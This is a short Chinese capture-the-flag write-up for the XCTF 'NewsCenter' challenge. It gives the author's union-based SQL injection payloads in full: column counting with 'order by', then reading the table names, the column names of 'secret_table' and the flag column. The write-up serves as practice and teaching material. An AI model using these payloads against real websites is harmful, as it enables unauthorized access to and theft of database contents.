xctf
NewsCenter
打开题目新闻搜索页面,显然存在sql注入
开始注入,首先看看表有多少列(因为union查询的时候需要和主查询的列数相同),依次构造payload 1’order by 1#,1’order by 2#。。。。回显都正常,当payload为1'order by 4#
的时候出现异常,所以说明一共有3列!
开始union查询,首先查看当前数据库所有表名,构造payload 1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
,结果如下
看到了一个secret_table,嘻嘻,再来看看所有列列名吧,构造payload 1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table'#
,查询结果如下:
哟,这不是flag列吗,直接查询,构造payload 1'union select 1,2,fl4g from news.secret_table#
,得到flag!